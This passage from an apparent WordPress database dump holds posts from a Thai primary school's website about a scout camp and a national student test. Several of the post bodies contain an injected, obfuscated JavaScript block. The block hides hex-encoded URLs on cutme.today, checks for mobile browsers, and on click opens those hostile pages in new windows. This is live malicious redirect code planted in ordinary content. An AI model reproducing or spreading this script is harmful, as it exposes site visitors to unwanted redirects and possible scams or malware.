_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร4-67','','inherit','closed','closed','','383-revision-v1','','','2024-08-01 20:32:45','2024-08-01 13:32:45','',383,'http://pakhaeng.ssk.in.th/?p=385',0,'revision','',0),
(386,1,'2024-08-01 20:33:45','2024-08-01 13:33:45','<!-- wp:paragraph -->\n<p><strong> วันที่ 16 กุมภาพันธ์ 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดยท่านผู้อำนวยการเสน่หา พลโสภา ได้จัดกิจกรรมเข้าค่าย เดินทางไกล และผจญภัยลูกเสือสำรอง ณ ค่ายลูกเสือชั่วคราวโรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":387,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5-67-724x1024.png\" alt=\"\" class=\"wp-image-387\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร 5-67','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3-5-67','','','2024-08-01 20:33:47','2024-08-01 13:33:47','',0,'http://pakhaeng.ssk.in.th/?p=386',0,'post','',0),
(387,1,'2024-08-01 20:33:33','2024-08-01 13:33:33','','5-67','','inherit','','closed','','5-67','','','2024-08-01 20:33:33','2024-08-01 13:33:33','',386,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5-67.png',0,'attachment','image/png',0),
(388,1,'2024-08-01 20:33:45','2024-08-01 13:33:45','<!-- wp:paragraph -->\n<p><strong> วันที่ 16 กุมภาพันธ์ 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดยท่านผู้อำนวยการเสน่หา พลโสภา ได้จัดกิจกรรมเข้าค่าย เดินทางไกล และผจญภัยลูกเสือสำรอง ณ ค่ายลูกเสือชั่วคราวโรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":387,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5-67-724x1024.png\" alt=\"\" class=\"wp-image-387\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร 5-67','','inherit','closed','closed','','386-revision-v1','','','2024-08-01 20:33:45','2024-08-01 13:33:45','',386,'http://pakhaeng.ssk.in.th/?p=388',0,'revision','',0),
(389,1,'2024-08-01 20:35:01','2024-08-01 13:35:01','<!-- wp:paragraph -->\n<p><strong> วันที่ 28 กุมภาพันธ์ 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดยท่านผู้อำนวยการเสน่หา พลโสภา และคณะครู ได้ดำเนินการทดสอบความสามาถพื้นฐานของผู้เรียนระดับชาติ เป็นการทดสอบเพื่อวัดความรู้ และความคิดรวบยอดของนักเรียนชั้นประถมศึกษาปีที่ 3</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":390,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/7-67-724x1024.png\" alt=\"\" class=\"wp-image-390\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\